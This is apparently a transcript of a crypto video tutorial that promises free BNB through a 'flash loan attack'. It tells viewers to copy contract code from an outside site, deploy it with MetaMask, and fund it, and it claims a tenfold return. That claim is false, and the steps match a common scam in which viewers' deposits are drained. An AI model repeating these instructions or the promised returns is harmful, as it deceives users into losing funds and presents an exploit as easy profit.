Hello, what's up guys? Crypto University here. Today, I will show you how to get BNB by using flash loan attack. First, open flashloanmix.com. Scroll down and click BNB to get flash loan attack source code. Next, open Remix Ethereum. Go to Solidity Compiler menu or menu number 2. On Compiler, select 0.5.0 version. Next, copy flash loan attack source code on the tutorial number 5. Go back to Remix Ethereum. Click Solidity File menu or menu number 1. Then create new file with name flashloan.sol. After that, paste the code. Go back to Solidity Compiler menu. Click Compile flashloan.sol. Open Deploy and Run Transaction menu or menu number 3. On Environment, change value to injected Web3. If this is your first time using Remix, there will be confirmation on MetaMask and accept that request. On contract, make it sure the value is flashloan.sol. Next, click Transact and confirm it on your MetaMask wallet. After transaction complete, copy your contract address that has been created and input liquidity using MetaMask wallet. If you input 17 on your liquidity and 10 on loan amount, it means 17 times 10 is 170. 170 is estimated BNB profit you will get. After transaction success, click Action to do flash loan attack and click Confirm on your MetaMask wallet. Wait until the contract finish and then check your MetaMask wallet. You should try it. Don't forget to like, share, and subscribe. And don't forget to turn on notification for our channel. Have fun and have a good day.